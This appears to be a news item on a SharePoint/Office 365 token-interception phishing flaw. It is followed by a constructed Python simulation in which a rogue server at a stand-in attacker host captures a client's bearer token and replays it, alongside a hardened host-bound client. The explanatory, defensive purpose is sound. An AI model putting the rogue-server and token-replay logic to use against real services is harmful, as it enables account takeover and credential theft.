A new possible phishing / man-in-the-middle attack against SharePoint servers

A flaw in Microsoft Office 365 can expose account credentials by way of a Word document hosted on a web server, and the attack is "totally invisible to existing perimeter and endpoint protection defenses," according to researcher Noam Liran.


When a user downloads a document from a SharePoint server, they must be logged in to their account. The server verifies the login credentials and issues an authentication token, which the client then presents on its subsequent requests.


Liran discovered that he could use his own server to mimic the responses expected from a sharepoint.com domain server, so that the client is prompted to hand over the token, which his server then intercepts.

Enabling two-factor authentication raises the bar for a plain phishing attempt, but note that on the description above the token is issued after the login has already completed, so a second factor protects the login step, not a token that is intercepted afterwards and replayed.
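The exchange described above, as an added stand-alone simulation written for this page (it is not Liran's code and not Office 365's real wire protocol): a tenant SharePoint server that issues a bearer token on login, a rogue server that returns the same authentication challenge the real server does, and a client that either sends its token to whichever host challenged for it (the flawed behaviour) or only to the tenant's own host (the hardened variant). The hostnames, header names, token format and credential are constructed assumptions for illustration; the "bind the token to the tenant host" check is the editor's illustration of a mitigation, not the vendor's fix.

```python
# Constructed example: the hosts, headers, token format and password below are
# assumptions for illustration, not Office 365's or SharePoint's real protocol.
import secrets
from dataclasses import dataclass, field
from urllib.parse import urlparse

TENANT_HOST = "contoso.sharepoint.com"        # assumed tenant host
ATTACKER_HOST = "docs.attacker.example"       # assumed attacker-controlled host
CHALLENGE = {"WWW-Authenticate": 'Bearer realm="sharepoint"'}  # assumed challenge


@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


def bearer_token(headers):
    """Extract the token from an 'Authorization: Bearer ...' header, or ''."""
    auth = headers.get("Authorization", "")
    return auth[len("Bearer "):].strip() if auth.startswith("Bearer ") else ""


class RealSharePoint:
    """Tenant server: verifies the login (where a second factor would live),
    issues a token, and afterwards serves documents to any holder of it."""
    def __init__(self):
        self.tokens = {}

    def login(self, user, password):
        if password != "correct horse battery staple":   # constructed credential
            return None
        token = secrets.token_hex(16)
        self.tokens[token] = user
        return token

    def handle(self, path, headers):
        if bearer_token(headers) not in self.tokens:
            return Response(401, dict(CHALLENGE))
        return Response(200, body=f"<document {path}>")


class RogueServer:
    """Attacker host: mimics the tenant's challenge and records any token sent."""
    def __init__(self):
        self.captured = []

    def handle(self, path, headers):
        token = bearer_token(headers)
        if token:
            self.captured.append(token)
            return Response(200, body="<harmless looking document>")
        return Response(401, dict(CHALLENGE))   # indistinguishable from the real one


def fetch_document(url, token, servers, bind_token_to_host):
    """Client: on a Bearer challenge, retries with the session token.

    bind_token_to_host=False reproduces the flaw (token goes to whoever asks);
    True only ever attaches the token to requests for TENANT_HOST.
    """
    parsed = urlparse(url)
    server = servers[parsed.hostname]
    resp = server.handle(parsed.path, {})
    if resp.status != 401 or "Bearer" not in resp.headers.get("WWW-Authenticate", ""):
        return resp
    if bind_token_to_host and parsed.hostname != TENANT_HOST:
        return Response(403, body=f"refused to send token to {parsed.hostname}")
    return server.handle(parsed.path, {"Authorization": f"Bearer {token}"})


def run_scenario(bind_token_to_host):
    """Run both fetches and an attacker replay; return what a defender cares about."""
    real, rogue = RealSharePoint(), RogueServer()
    servers = {TENANT_HOST: real, ATTACKER_HOST: rogue}
    token = real.login("alice", "correct horse battery staple")

    legit = fetch_document(f"https://{TENANT_HOST}/sites/hr/policy.docx",
                           token, servers, bind_token_to_host)
    fetch_document(f"https://{ATTACKER_HOST}/invoice.docx",
                   token, servers, bind_token_to_host)

    # The attacker replays whatever was captured against the real tenant.
    # No login happens here, so a second factor at login never gets a say.
    replay_ok = any(
        real.handle("/sites/hr/policy.docx", {"Authorization": f"Bearer {t}"}).status == 200
        for t in rogue.captured
    )
    return {"legit_fetch_ok": legit.status == 200,
            "tokens_captured": len(rogue.captured),
            "replay_ok": replay_ok}


if __name__ == "__main__":
    print("flawed client:  ", run_scenario(bind_token_to_host=False))
    print("hardened client:", run_scenario(bind_token_to_host=True))
```

With the flawed client the rogue host captures a valid token and replays it successfully; with the host-bound client the legitimate download still works and nothing is captured. The point of the replay step is the caveat above: once the token exists, the attacker never logs in, so a second factor on login does not block the replay.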

